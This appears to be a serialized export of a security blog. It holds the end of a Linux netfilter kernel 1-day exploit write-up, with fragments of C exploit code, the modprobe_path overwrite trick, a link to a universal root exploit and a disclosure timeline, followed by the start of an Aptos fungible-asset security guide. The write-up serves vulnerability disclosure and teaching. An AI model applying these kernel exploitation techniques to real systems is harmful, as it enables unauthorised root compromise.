i",{"type":26,"tag":137,"props":63213,"children":63214},{"style":5590},[63215],{"type":32,"value":53872},{"type":26,"tag":137,"props":63217,"children":63218},{"style":5601},[63219],{"type":32,"value":5742},{"type":26,"tag":137,"props":63221,"children":63222},{"class":5559,"line":26325},[63223],{"type":26,"tag":137,"props":63224,"children":63225},{"style":5601},[63226],{"type":32,"value":34254},{"type":26,"tag":137,"props":63228,"children":63229},{"class":5559,"line":26358},[63230,63234,63238,63243,63247,63252,63257,63261,63266,63270,63274,63279,63283,63287,63291],{"type":26,"tag":137,"props":63231,"children":63232},{"style":5610},[63233],{"type":32,"value":61402},{"type":26,"tag":137,"props":63235,"children":63236},{"style":5601},[63237],{"type":32,"value":4625},{"type":26,"tag":137,"props":63239,"children":63240},{"style":5682},[63241],{"type":32,"value":63242},"read",{"type":26,"tag":137,"props":63244,"children":63245},{"style":5601},[63246],{"type":32,"value":165},{"type":26,"tag":137,"props":63248,"children":63249},{"style":5584},[63250],{"type":32,"value":63251},"sock",{"type":26,"tag":137,"props":63253,"children":63254},{"style":5601},[63255],{"type":32,"value":63256},"[i][",{"type":26,"tag":137,"props":63258,"children":63259},{"style":5626},[63260],{"type":32,"value":878},{"type":26,"tag":137,"props":63262,"children":63263},{"style":5601},[63264],{"type":32,"value":63265},"], leak, ",{"type":26,"tag":137,"props":63267,"children":63268},{"style":5626},[63269],{"type":32,"value":60749},{"type":26,"tag":137,"props":63271,"children":63272},{"style":5590},[63273],{"type":32,"value":53858},{"type":26,"tag":137,"props":63275,"children":63276},{"style":5626},[63277],{"type":32,"value":63278}," 320",{"type":26,"tag":137,"props":63280,"children":63281},{"style":5601},[63282],{"type":32,"value":5671},{"type":26,"tag":137,"props":63284,"children":63285},{"style":5590},[63286],{"type":32,"value":8391},{"type":26,"tag":137,"props":63288,"children":63289},{"style":5626},[63290],{"type":32,"value":5629},{"type":26,"tag":137,"props":63292,"children":63293},{"style":5601},[63294],{"type":32,"value":5742},{"type":26,"tag":137,"props":63296,"children":63297},{"class":5559,"line":26366},[63298],{"type":26,"tag":137,"props":63299,"children":63300},{"style":5601},[63301],{"type":32,"value":34290},{"type":26,"tag":137,"props":63303,"children":63304},{"class":5559,"line":26374},[63305,63310,63314,63319],{"type":26,"tag":137,"props":63306,"children":63307},{"style":5682},[63308],{"type":32,"value":63309},"                perror",{"type":26,"tag":137,"props":63311,"children":63312},{"style":5601},[63313],{"type":32,"value":165},{"type":26,"tag":137,"props":63315,"children":63316},{"style":6837},[63317],{"type":32,"value":63318},"\"[-] read(socket)\"",{"type":26,"tag":137,"props":63320,"children":63321},{"style":5601},[63322],{"type":32,"value":6430},{"type":26,"tag":137,"props":63324,"children":63325},{"class":5559,"line":26411},[63326,63331,63335,63339],{"type":26,"tag":137,"props":63327,"children":63328},{"style":5610},[63329],{"type":32,"value":63330},"                return",{"type":26,"tag":137,"props":63332,"children":63333},{"style":5590},[63334],{"type":32,"value":53858},{"type":26,"tag":137,"props":63336,"children":63337},{"style":5626},[63338],{"type":32,"value":878},{"type":26,"tag":137,"props":63340,"children":63341},{"style":5601},[63342],{"type":32,"value":5604},{"type":26,"tag":137,"props":63344,"children":63345},{"class":5559,"line":26424},[63346],{"type":26,"tag":137,"props":63347,"children":63348},{"style":5601},[63349],{"type":32,"value":61486},{"type":26,"tag":137,"props":63351,"children":63352},{"class":5559,"line":26437},[63353],{"type":26,"tag":137,"props":63354,"children":63355},{"style":5601},[63356],{"type":32,"value":5936},{"type":26,"tag":137,"props":63358,"children":63359},{"class":5559,"line":26450},[63360],{"type":26,"tag":137,"props":63361,"children":63362},{"style":5601},[63363],{"type":32,"value":5945},{"type":26,"tag":137,"props":63365,"children":63366},{"class":5559,"line":26504},[63367,63371,63375,63380],{"type":26,"tag":137,"props":63368,"children":63369},{"style":5682},[63370],{"type":32,"value":58109},{"type":26,"tag":137,"props":63372,"children":63373},{"style":5601},[63374],{"type":32,"value":165},{"type":26,"tag":137,"props":63376,"children":63377},{"style":6837},[63378],{"type":32,"value":63379},"\"[-] fake modprobe failed\"",{"type":26,"tag":137,"props":63381,"children":63382},{"style":5601},[63383],{"type":32,"value":6430},{"type":26,"tag":137,"props":63385,"children":63386},{"class":5559,"line":26513},[63387],{"type":26,"tag":137,"props":63388,"children":63389},{"style":5601},[63390],{"type":32,"value":12908},{"type":26,"tag":35,"props":63392,"children":63393},{},[63394,63396,63403],{"type":32,"value":63395},"This trick has already been throughly detailed by ",{"type":26,"tag":41,"props":63397,"children":63400},{"href":63398,"rel":63399},"https://pwning.tech/nftables/#28-overwriting-modprobepath",[45],[63401],{"type":32,"value":63402},"lau",{"type":32,"value":63404},", so we won't go much more into it.",{"type":26,"tag":118,"props":63406,"children":63408},{"id":63407},"universal-exploit-demo",[63409],{"type":32,"value":63410},"Universal exploit demo",{"type":26,"tag":35,"props":63412,"children":63413},{},[63414,63416,63422],{"type":32,"value":63415},"{%youtube tjbp4Mtfo8w %}\nYou can find the complete universal exploit in our ",{"type":26,"tag":41,"props":63417,"children":63420},{"href":63418,"rel":63419},"https://github.com/otter-sec/OtterRoot/blob/master/universal/exploit.c",[45],[63421],{"type":32,"value":60016},{"type":32,"value":470},{"type":26,"tag":92,"props":63424,"children":63425},{"id":5261},[63426],{"type":32,"value":63427},"Disclosure Timeline",{"type":26,"tag":3426,"props":63429,"children":63430},{},[63431,63436,63441,63446,63451],{"type":26,"tag":3430,"props":63432,"children":63433},{},[63434],{"type":32,"value":63435},"March 21st -- Patch made public",{"type":26,"tag":3430,"props":63437,"children":63438},{},[63439],{"type":32,"value":63440},"March 23rd -- Scrolled through commits and found the bug fix.",{"type":26,"tag":3430,"props":63442,"children":63443},{},[63444],{"type":32,"value":63445},"March 24th -- Wrote KernelCTF exploit",{"type":26,"tag":3430,"props":63447,"children":63448},{},[63449],{"type":32,"value":63450},"March 26th -- Wrote Universal exploit",{"type":26,"tag":3430,"props":63452,"children":63453},{},[63454],{"type":32,"value":63455},"May 23rd -- Patch landed on Ubuntu and Debian",{"type":26,"tag":35,"props":63457,"children":63458},{},[63459],{"type":32,"value":63460},"Note that the universal exploit was alive for roughly 2 months against popular distros.",{"type":26,"tag":92,"props":63462,"children":63463},{"id":31526},[63464],{"type":32,"value":21540},{"type":26,"tag":35,"props":63466,"children":63467},{},[63468],{"type":32,"value":63469},"In this post, I have discussed how a bug fixed by a commit freshly made public can be used to exploit the latest stable releases of the kernel and maintain 0day-like primitives for an extended period. I've also discussed two different paths to exploit the vulnerability: one that I used to exploit the KernelCTF instance and retrieve the flag and a second one that I used to craft a universal exploit binary that works stably in all tested targets without needing to be adapted or even recompiled.",{"type":26,"tag":35,"props":63471,"children":63472},{},[63473],{"type":32,"value":63474},"What we have observed is not novel; despite the efforts and progress made by the Linux community to improve kernel security, it's been made evident that the supply of exploitable bugs is still virtually unlimited and that the open-source patch gap is long enough to maintain capabilities that are live.",{"type":26,"tag":7949,"props":63476,"children":63477},{},[63478],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":63480},[63481,63484,63487,63490,63491,63501,63509,63510],{"id":53170,"depth":5412,"text":53173,"children":63482},[63483],{"id":53191,"depth":5417,"text":53194},{"id":53234,"depth":5412,"text":53234,"children":63485},[63486],{"id":53281,"depth":5417,"text":53284},{"id":53339,"depth":5412,"text":53342,"children":63488},[63489],{"id":54502,"depth":5417,"text":54505},{"id":56377,"depth":5412,"text":56380},{"id":56779,"depth":5412,"text":56782,"children":63492},[63493,63494,63495,63497,63498,63499,63500],{"id":56806,"depth":5417,"text":56809},{"id":57687,"depth":5417,"text":57690},{"id":58273,"depth":5417,"text":63496},"Leaking self pointer of nft_object",{"id":58670,"depth":5417,"text":58673},{"id":59183,"depth":5417,"text":59186},{"id":59313,"depth":5417,"text":58971},{"id":59997,"depth":5417,"text":60000},{"id":60020,"depth":5412,"text":60023,"children":63502},[63503,63504,63505,63506,63508],{"id":60031,"depth":5417,"text":60034},{"id":60889,"depth":5417,"text":60892},{"id":60965,"depth":5417,"text":60968},{"id":62590,"depth":5417,"text":63507},"Overwriting modprobe_path",{"id":63407,"depth":5417,"text":63410},{"id":5261,"depth":5412,"text":63427},{"id":31526,"depth":5412,"text":21540},"content:blog:2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day",{"_path":63515,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":63516,"description":63517,"image":63518,"date":63520,"isFeatured":18,"onBlogPage":18,"tags":63521,"body":63522,"_type":5433,"_id":70239,"_source":5435,"_file":70240,"_stem":70241,"_extension":5438},"/blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets","Hitchhiker's Guide to Aptos Fungible Assets","We take a deep dive into Aptos’ implementation of fungible assets, exploring the intricacies hidden within its functions, objects, and interactions. While the Fungible Asset model was designed to address the limitations and security flaws of the legacy Coin standard, it also introduced new challenges and vulnerabilities that developers should be aware of.",{"src":63519,"width":7969,"height":7970},"/posts/aptos-guide/title.png","2025-02-10",[8465],{"type":23,"children":63523,"toc":70223},[63524,63537,63542,63551,63557,63585,63658,63698,63732,63893,63912,63993,64033,64061,64078,64083,64091,64096,64102,64123,64203,64236,64244,64257,64262,64645,64650,64655,64661,64666,64678,64782,64820,64823,64841,65149,65154,65166,65172,65198,65219,65224,65403,65423,65429,65449,65461,65466,65472,65484,65547,65574,65598,65819,65822,65841,65951,66008,66144,66171,66177,66203,66447,66475,66777,66810,66824,66850,66883,67190,67202,67479,67493,67810,67829,67835,67867,67907,68008,68028,68148,68165,68239,68251,68339,68360,68366,68371,68376,68393,68414,68785,68844,68849,69300,69305,69341,69347,69359,69381,69407,69614,69628,69883,69895,69922,70073,70092,70122,70126,70137,70142,70155,70219],{"type":26,"tag":35,"props":63525,"children":63526},{},[63527,63529,63535],{"type":32,"value":63528},"Aptos’ fungible asset model is a complex component of its ecosystem, designed to address the limitations of its predecessor — the ",{"type":26,"tag":130,"props":63530,"children":63532},{"className":63531},[],[63533],{"type":32,"value":63534},"coin",{"type":32,"value":63536}," standard. While the new model aims to enhance functionality and security, it also comes with its own set of challenges.",{"type":26,"tag":35,"props":63538,"children":63539},{},[63540],{"type":32,"value":63541},"In this blog post, we'll closely examine Aptos's coin and fungible asset models, exploring their history and connection. We will examine key aspects of the fungible asset framework, including real-world examples of vulnerabilities that were identified and addressed, with the goal of improving security and reliability — all to help you build more secure and reliable applications.",{"type":26,"tag":63543,"props":63544,"children":63545},"important",{},[63546],{"type":26,"tag":35,"props":63547,"children":63548},{},[63549],{"type":32,"value":63550},"All issues mentioned were identified and addressed during Aptos' rigorous pre-release audits, demonstrating the project's dedication to delivering a robust and secure environment from day one.",{"type":26,"tag":92,"props":63552,"children":63554},{"id":63553},"aptos-coin-standard",[63555],{"type":32,"value":63556},"Aptos Coin standard",{"type":26,"tag":35,"props":63558,"children":63559},{},[63560,63562,63568,63570,63575,63576,63583],{"type":32,"value":63561},"In the beginning, Aptos used ",{"type":26,"tag":130,"props":63563,"children":63565},{"className":63564},[],[63566],{"type":32,"value":63567},"Coin",{"type":32,"value":63569},". It is still in use, although it is now considered \"legacy\". ",{"type":26,"tag":130,"props":63571,"children":63573},{"className":63572},[],[63574],{"type":32,"value":63567},{"type":32,"value":8085},{"type":26,"tag":41,"props":63577,"children":63580},{"href":63578,"rel":63579},"https://github.com/aptos-labs/aptos-core/blob/1381c93fd5a656f16fb326d4ffe371947554a330/aptos-move/framework/aptos-framework/sources/coin.move#L119-L123",[45],[63581],{"type":32,"value":63582},"defined",{"type":32,"value":63584}," in Aptos as follows:",{"type":26,"tag":5512,"props":63586,"children":63588},{"className":5552,"code":63587,"language":5551,"meta":7,"style":7},"struct Coin\u003Cphantom CoinType> has store {\n    value: u64,\n}\n",[63589],{"type":26,"tag":130,"props":63590,"children":63591},{"__ignoreMap":7},[63592,63631,63651],{"type":26,"tag":137,"props":63593,"children":63594},{"class":5559,"line":5560},[63595,63599,63603,63607,63611,63615,63619,63623,63627],{"type":26,"tag":137,"props":63596,"children":63597},{"style":5573},[63598],{"type":32,"value":11990},{"type":26,"tag":137,"props":63600,"children":63601},{"style":6009},[63602],{"type":32,"value":8386},{"type":26,"tag":137,"props":63604,"children":63605},{"style":5601},[63606],{"type":32,"value":8391},{"type":26,"tag":137,"props":63608,"children":63609},{"style":5584},[63610],{"type":32,"value":8396},{"type":26,"tag":137,"props":63612,"children":63613},{"style":6009},[63614],{"type":32,"value":8401},{"type":26,"tag":137,"props":63616,"children":63617},{"style":5601},[63618],{"type":32,"value":8406},{"type":26,"tag":137,"props":63620,"children":63621},{"style":5584},[63622],{"type":32,"value":8411},{"type":26,"tag":137,"props":63624,"children":63625},{"style":5584},[63626],{"type":32,"value":8416},{"type":26,"tag":137,"props":63628,"children":63629},{"style":5601},[63630],{"type":32,"value":5875},{"type":26,"tag":137,"props":63632,"children":63633},{"class":5559,"line":5412},[63634,63639,63643,63647],{"type":26,"tag":137,"props":63635,"children":63636},{"style":5584},[63637],{"type":32,"value":63638},"    value",{"type":26,"tag":137,"props":63640,"children":63641},{"style":5590},[63642],{"type":32,"value":7072},{"type":26,"tag":137,"props":63644,"children":63645},{"style":6009},[63646],{"type":32,"value":8445},{"type":26,"tag":137,"props":63648,"children":63649},{"style":5601},[63650],{"type":32,"value":6099},{"type":26,"tag":137,"props":63652,"children":63653},{"class":5559,"line":5417},[63654],{"type":26,"tag":137,"props":63655,"children":63656},{"style":5601},[63657],{"type":32,"value":6507},{"type":26,"tag":35,"props":63659,"children":63660},{},[63661,63663,63668,63670,63676,63677,63683,63685,63690,63692,63697],{"type":32,"value":63662},"Aptos distinguishes coins by their type (",{"type":26,"tag":130,"props":63664,"children":63666},{"className":63665},[],[63667],{"type":32,"value":9167},{"type":32,"value":63669},") at compile time. For example, ",{"type":26,"tag":130,"props":63671,"children":63673},{"className":63672},[],[63674],{"type":32,"value":63675},"Coin\u003COtter>",{"type":32,"value":3339},{"type":26,"tag":130,"props":63678,"children":63680},{"className":63679},[],[63681],{"type":32,"value":63682},"Coin\u003CWeasel>",{"type":32,"value":63684}," represent different coins, and you cannot pass a ",{"type":26,"tag":130,"props":63686,"children":63688},{"className":63687},[],[63689],{"type":32,"value":63682},{"type":32,"value":63691}," to a function expecting ",{"type":26,"tag":130,"props":63693,"children":63695},{"className":63694},[],[63696],{"type":32,"value":63675},{"type":32,"value":470},{"type":26,"tag":35,"props":63699,"children":63700},{},[63701,63703,63708,63710,63715,63717,63722,63724,63730],{"type":32,"value":63702},"The type signature reveals why ",{"type":26,"tag":130,"props":63704,"children":63706},{"className":63705},[],[63707],{"type":32,"value":63567},{"type":32,"value":63709}," has become a legacy standard. ",{"type":26,"tag":130,"props":63711,"children":63713},{"className":63712},[],[63714],{"type":32,"value":63567},{"type":32,"value":63716}," has only the ",{"type":26,"tag":130,"props":63718,"children":63720},{"className":63719},[],[63721],{"type":32,"value":8526},{"type":32,"value":63723}," ability and uses a ",{"type":26,"tag":130,"props":63725,"children":63727},{"className":63726},[],[63728],{"type":32,"value":63729},"CoinStore",{"type":32,"value":63731}," wrapper to store the coin and metadata:",{"type":26,"tag":5512,"props":63733,"children":63735},{"className":5552,"code":63734,"language":5551,"meta":7,"style":7},"struct CoinStore\u003Cphantom CoinType> has key {\n    coin: Coin\u003CCoinType>,\n    frozen: bool,\n    deposit_events: EventHandle\u003CDepositEvent>,\n    withdraw_events: EventHandle\u003CWithdrawEvent>,\n}\n",[63736],{"type":26,"tag":130,"props":63737,"children":63738},{"__ignoreMap":7},[63739,63779,63807,63827,63857,63886],{"type":26,"tag":137,"props":63740,"children":63741},{"class":5559,"line":5560},[63742,63746,63751,63755,63759,63763,63767,63771,63775],{"type":26,"tag":137,"props":63743,"children":63744},{"style":5573},[63745],{"type":32,"value":11990},{"type":26,"tag":137,"props":63747,"children":63748},{"style":6009},[63749],{"type":32,"value":63750}," CoinStore",{"type":26,"tag":137,"props":63752,"children":63753},{"style":5601},[63754],{"type":32,"value":8391},{"type":26,"tag":137,"props":63756,"children":63757},{"style":5584},[63758],{"type":32,"value":8396},{"type":26,"tag":137,"props":63760,"children":63761},{"style":6009},[63762],{"type":32,"value":8401},{"type":26,"tag":137,"props":63764,"children":63765},{"style":5601},[63766],{"type":32,"value":8406},{"type":26,"tag":137,"props":63768,"children":63769},{"style":5584},[63770],{"type":32,"value":8411},{"type":26,"tag":137,"props":63772,"children":63773},{"style":5584},[63774],{"type":32,"value":8517},{"type":26,"tag":137,"props":63776,"children":63777},{"style":5601},[63778],{"type":32,"value":5875},{"type":26,"tag":137,"props":63780,"children":63781},{"class":5559,"line":5412},[63782,63787,63791,63795,63799,63803],{"type":26,"tag":137,"props":63783,"children":63784},{"style":5584},[63785],{"type":32,"value":63786},"    coin",{"type":26,"tag":137,"props":63788,"children":63789},{"style":5590},[63790],{"type":32,"value":7072},{"type":26,"tag":137,"props":63792,"children":63793},{"style":6009},[63794],{"type":32,"value":8386},{"type":26,"tag":137,"props":63796,"children":63797},{"style":5601},[63798],{"type":32,"value":8391},{"type":26,"tag":137,"props":63800,"children":63801},{"style":6009},[63802],{"type":32,"value":9167},{"type":26,"tag":137,"props":63804,"children":63805},{"style":5601},[63806],{"type":32,"value":8723},{"type":26,"tag":137,"props":63808,"children":63809},{"class":5559,"line":5417},[63810,63815,63819,63823],{"type":26,"tag":137,"props":63811,"children":63812},{"style":5584},[63813],{"type":32,"value":63814},"    frozen",{"type":26,"tag":137,"props":63816,"children":63817},{"style":5590},[63818],{"type":32,"value":7072},{"type":26,"tag":137,"props":63820,"children":63821},{"style":6009},[63822],{"type":32,"value":14641},{"type":26,"tag":137,"props":63824,"children":63825},{"style":5601},[63826],{"type":32,"value":6099},{"type":26,"tag":137,"props":63828,"children":63829},{"class":5559,"line":5642},[63830,63835,63839,63844,63848,63853],{"type":26,"tag":137,"props":63831,"children":63832},{"style":5584},[63833],{"type":32,"value":63834},"    deposit_events",{"type":26,"tag":137,"props":63836,"children":63837},{"style":5590},[63838],{"type":32,"value":7072},{"type":26,"tag":137,"props":63840,"children":63841},{"style":6009},[63842],{"type":32,"value":63843}," EventHandle",{"type":26,"tag":137,"props":63845,"children":63846},{"style":5601},[63847],{"type":32,"value":8391},{"type":26,"tag":137,"props":63849,"children":63850},{"style":6009},[63851],{"type":32,"value":63852},"DepositEvent",{"type":26,"tag":137,"props":63854,"children":63855},{"style":5601},[63856],{"type":32,"value":8723},{"type":26,"tag":137,"props":63858,"children":63859},{"class":5559,"line":5745},[63860,63865,63869,63873,63877,63882],{"type":26,"tag":137,"props":63861,"children":63862},{"style":5584},[63863],{"type":32,"value":63864},"    withdraw_events",{"type":26,"tag":137,"props":63866,"children":63867},{"style":5590},[63868],{"type":32,"value":7072},{"type":26,"tag":137,"props":63870,"children":63871},{"style":6009},[63872],{"type":32,"value":63843},{"type":26,"tag":137,"props":63874,"children":63875},{"style":5601},[63876],{"type":32,"value":8391},{"type":26,"tag":137,"props":63878,"children":63879},{"style":6009},[63880],{"type":32,"value":63881},"WithdrawEvent",{"type":26,"tag":137,"props":63883,"children":63884},{"style":5601},[63885],{"type":32,"value":8723},{"type":26,"tag":137,"props":63887,"children":63888},{"class":5559,"line":5850},[63889],{"type":26,"tag":137,"props":63890,"children":63891},{"style":5601},[63892],{"type":32,"value":6507},{"type":26,"tag":35,"props":63894,"children":63895},{},[63896,63898,63903,63905,63910],{"type":32,"value":63897},"However, an astute reader would note that this isn't the only place a ",{"type":26,"tag":130,"props":63899,"children":63901},{"className":63900},[],[63902],{"type":32,"value":63567},{"type":32,"value":63904}," can be stored. You can create your own ",{"type":26,"tag":130,"props":63906,"children":63908},{"className":63907},[],[63909],{"type":32,"value":63567},{"type":32,"value":63911}," wallet, which could look like this:",{"type":26,"tag":5512,"props":63913,"children":63915},{"className":5552,"code":63914,"language":5551,"meta":7,"style":7},"struct DefinitelyLegitCoinStore\u003Cphantom CoinType> has key {\n    coin: Coin\u003CCoinType>\n}\n",[63916],{"type":26,"tag":130,"props":63917,"children":63918},{"__ignoreMap":7},[63919,63959,63986],{"type":26,"tag":137,"props":63920,"children":63921},{"class":5559,"line":5560},[63922,63926,63931,63935,63939,63943,63947,63951,63955],{"type":26,"tag":137,"props":63923,"children":63924},{"style":5573},[63925],{"type":32,"value":11990},{"type":26,"tag":137,"props":63927,"children":63928},{"style":6009},[63929],{"type":32,"value":63930}," DefinitelyLegitCoinStore",{"type":26,"tag":137,"props":63932,"children":63933},{"style":5601},[63934],{"type":32,"value":8391},{"type":26,"tag":137,"props":63936,"children":63937},{"style":5584},[63938],{"type":32,"value":8396},{"type":26,"tag":137,"props":63940,"children":63941},{"style":6009},[63942],{"type":32,"value":8401},{"type":26,"tag":137,"props":63944,"children":63945},{"style":5601},[63946],{"type":32,"value":8406},{"type":26,"tag":137,"props":63948,"children":63949},{"style":5584},[63950],{"type":32,"value":8411},{"type":26,"tag":137,"props":63952,"children":63953},{"style":5584},[63954],{"type":32,"value":8517},{"type":26,"tag":137,"props":63956,"children":63957},{"style":5601},[63958],{"type":32,"value":5875},{"type":26,"tag":137,"props":63960,"children":63961},{"class":5559,"line":5412},[63962,63966,63970,63974,63978,63982],{"type":26,"tag":137,"props":63963,"children":63964},{"style":5584},[63965],{"type":32,"value":63786},{"type":26,"tag":137,"props":63967,"children":63968},{"style":5590},[63969],{"type":32,"value":7072},{"type":26,"tag":137,"props":63971,"children":63972},{"style":6009},[63973],{"type":32,"value":8386},{"type":26,"tag":137,"props":63975,"children":63976},{"style":5601},[63977],{"type":32,"value":8391},{"type":26,"tag":137,"props":63979,"children":63980},{"style":6009},[63981],{"type":32,"value":9167},{"type":26,"tag":137,"props":63983,"children":63984},{"style":5601},[63985],{"type":32,"value":8577},{"type":26,"tag":137,"props":63987,"children":63988},{"class":5559,"line":5417},[63989],{"type":26,"tag":137,"props":63990,"children":63991},{"style":5601},[63992],{"type":32,"value":6507},{"type":26,"tag":35,"props":63994,"children":63995},{},[63996,64001,64003,64009,64011,64016,64018,64024,64026,64031],{"type":26,"tag":130,"props":63997,"children":63999},{"className":63998},[],[64000],{"type":32,"value":63729},{"type":32,"value":64002}," includes a ",{"type":26,"tag":130,"props":64004,"children":64006},{"className":64005},[],[64007],{"type":32,"value":64008},"frozen",{"type":32,"value":64010}," field, allowing the issuer to block transfers to and from the store. ",{"type":26,"tag":130,"props":64012,"children":64014},{"className":64013},[],[64015],{"type":32,"value":63729},{"type":32,"value":64017}," is also required for a ",{"type":26,"tag":130,"props":64019,"children":64021},{"className":64020},[],[64022],{"type":32,"value":64023},"burn_from",{"type":32,"value":64025}," operation, which withdraws the ",{"type":26,"tag":130,"props":64027,"children":64029},{"className":64028},[],[64030],{"type":32,"value":63534},{"type":32,"value":64032}," from the store and destroys it. Freezing and burning operations are essential i.e. for stablecoin issuers, using them as compliance tools to prevent unauthorized or illegal transactions and adhere to legal orders. Being able to bypass these restrictions with a custom wallet is an issue and can lead to severe consequences.",{"type":26,"tag":35,"props":64034,"children":64035},{},[64036,64038,64043,64045,64052,64054,64059],{"type":32,"value":64037},"Storing ",{"type":26,"tag":130,"props":64039,"children":64041},{"className":64040},[],[64042],{"type":32,"value":63534},{"type":32,"value":64044}," in a custom wallet is also a problem in terms of off-chain observability, as finding the stored coins in such setup is a difficult task. This is how the fungible asset ",{"type":26,"tag":41,"props":64046,"children":64049},{"href":64047,"rel":64048},"https://github.com/aptos-foundation/AIPs/blob/ac3da48db226cf2dbaf4df6f1f5109a4f1b2e604/aips/aip-21.md",[45],[64050],{"type":32,"value":64051},"AIP-21",{"type":32,"value":64053}," summarizes the ",{"type":26,"tag":130,"props":64055,"children":64057},{"className":64056},[],[64058],{"type":32,"value":63534},{"type":32,"value":64060}," problems:",{"type":26,"tag":5503,"props":64062,"children":64063},{},[64064,64073],{"type":26,"tag":35,"props":64065,"children":64066},{},[64067,64071],{"type":26,"tag":137,"props":64068,"children":64069},{},[64070],{"type":32,"value":12180},{"type":32,"value":64072}," coin module has been deemed insufficient for current and future needs due to the rigidity of Move structs and the inherently poor extensibility.",{"type":26,"tag":35,"props":64074,"children":64075},{},[64076],{"type":32,"value":64077},"The existing Coin struct leverages the store ability allowing for assets on-chain to become untraceable. Creating challenges to off-chain observability and on-chain management, such as freezing or burning.",{"type":26,"tag":35,"props":64079,"children":64080},{},[64081],{"type":32,"value":64082},"And declares, that:",{"type":26,"tag":5503,"props":64084,"children":64085},{},[64086],{"type":26,"tag":35,"props":64087,"children":64088},{},[64089],{"type":32,"value":64090},"Fungible assets addresses these issues.",{"type":26,"tag":35,"props":64092,"children":64093},{},[64094],{"type":32,"value":64095},"Let's find out whether this is indeed the case.",{"type":26,"tag":92,"props":64097,"children":64099},{"id":64098},"the-fungible-assets",[64100],{"type":32,"value":64101},"The fungible assets",{"type":26,"tag":35,"props":64103,"children":64104},{},[64105,64107,64113,64115,64122],{"type":32,"value":64106},"Aptos designed fungible assets as a new token standard to solve these problems. A ",{"type":26,"tag":130,"props":64108,"children":64110},{"className":64109},[],[64111],{"type":32,"value":64112},"FungibleAsset",{"type":32,"value":64114}," uses the ",{"type":26,"tag":41,"props":64116,"children":64119},{"href":64117,"rel":64118},"https://medium.com/@borispovod/move-hot-potato-pattern-bbc48a48d93c",[45],[64120],{"type":32,"value":64121},"hot-potato pattern",{"type":32,"value":7072},{"type":26,"tag":5512,"props":64124,"children":64126},{"className":5552,"code":64125,"language":5551,"meta":7,"style":7},"struct FungibleAsset {\n    metadata: Object\u003CMetadata>,\n    amount: u64,\n}\n",[64127],{"type":26,"tag":130,"props":64128,"children":64129},{"__ignoreMap":7},[64130,64146,64176,64196],{"type":26,"tag":137,"props":64131,"children":64132},{"class":5559,"line":5560},[64133,64137,64142],{"type":26,"tag":137,"props":64134,"children":64135},{"style":5573},[64136],{"type":32,"value":11990},{"type":26,"tag":137,"props":64138,"children":64139},{"style":6009},[64140],{"type":32,"value":64141}," FungibleAsset",{"type":26,"tag":137,"props":64143,"children":64144},{"style":5601},[64145],{"type":32,"value":5875},{"type":26,"tag":137,"props":64147,"children":64148},{"class":5559,"line":5412},[64149,64154,64158,64163,64167,64172],{"type":26,"tag":137,"props":64150,"children":64151},{"style":5584},[64152],{"type":32,"value":64153},"    metadata",{"type":26,"tag":137,"props":64155,"children":64156},{"style":5590},[64157],{"type":32,"value":7072},{"type":26,"tag":137,"props":64159,"children":64160},{"style":6009},[64161],{"type":32,"value":64162}," Object",{"type":26,"tag":137,"props":64164,"children":64165},{"style":5601},[64166],{"type":32,"value":8391},{"type":26,"tag":137,"props":64168,"children":64169},{"style":6009},[64170],{"type":32,"value":64171},"Metadata",{"type":26,"tag":137,"props":64173,"children":64174},{"style":5601},[64175],{"type":32,"value":8723},{"type":26,"tag":137,"props":64177,"children":64178},{"class":5559,"line":5417},[64179,64184,64188,64192],{"type":26,"tag":137,"props":64180,"children":64181},{"style":5584},[64182],{"type":32,"value":64183},"    amount",{"type":26,"tag":137,"props":64185,"children":64186},{"style":5590},[64187],{"type":32,"value":7072},{"type":26,"tag":137,"props":64189,"children":64190},{"style":6009},[64191],{"type":32,"value":8445},{"type":26,"tag":137,"props":64193,"children":64194},{"style":5601},[64195],{"type":32,"value":6099},{"type":26,"tag":137,"props":64197,"children":64198},{"class":5559,"line":5642},[64199],{"type":26,"tag":137,"props":64200,"children":64201},{"style":5601},[64202],{"type":32,"value":6507},{"type":26,"tag":35,"props":64204,"children":64205},{},[64206,64208,64213,64214,64219,64221,64226,64228,64235],{"type":32,"value":64207},"Unlike ",{"type":26,"tag":130,"props":64209,"children":64211},{"className":64210},[],[64212],{"type":32,"value":63567},{"type":32,"value":1108},{"type":26,"tag":130,"props":64215,"children":64217},{"className":64216},[],[64218],{"type":32,"value":64112},{"type":32,"value":64220}," types are defined at runtime through the ",{"type":26,"tag":130,"props":64222,"children":64224},{"className":64223},[],[64225],{"type":32,"value":64171},{"type":32,"value":64227}," field. This change was meant to ",{"type":26,"tag":41,"props":64229,"children":64232},{"href":64230,"rel":64231},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-21.md#specification",[45],[64233],{"type":32,"value":64234},"enhance extensibility",{"type":32,"value":7072},{"type":26,"tag":5503,"props":64237,"children":64238},{},[64239],{"type":26,"tag":35,"props":64240,"children":64241},{},[64242],{"type":32,"value":64243},"An object can have other resources attached to provide additional context. For example, the metadata could define a gem of a given type, color, quality, and rarity, where ownership indicates the quantity or total weight owned of that type of gem.",{"type":26,"tag":35,"props":64245,"children":64246},{},[64247,64249,64255],{"type":32,"value":64248},"An important implication is that functions accepting ",{"type":26,"tag":130,"props":64250,"children":64252},{"className":64251},[],[64253],{"type":32,"value":64254},"FungibleAssets",{"type":32,"value":64256}," must verify the metadata to ensure valid assets.",{"type":26,"tag":35,"props":64258,"children":64259},{},[64260],{"type":32,"value":64261},"Let's consider a possible implementation of a protocol that takes in assets.",{"type":26,"tag":5512,"props":64263,"children":64265},{"className":5552,"code":64264,"language":5551,"meta":7,"style":7},"public fun deposit\u003CT: key>(\n    sender: &signer, fa: FungibleAsset\n) acquires [...] {\n    assert_not_paused();\n    \n    let fa_amount = fungible_asset::amount(&fa);\n    let sender_address = address_of(sender);\n    check_compliance(fa_amount, sender_address);\n    \n    increase_deposit(get_vault(sender_address), fa_amount);\n    \n    primary_fungible_store::deposit(global_vault_address(), fa);\n    \n    event::emit(Deposit {sender_address, 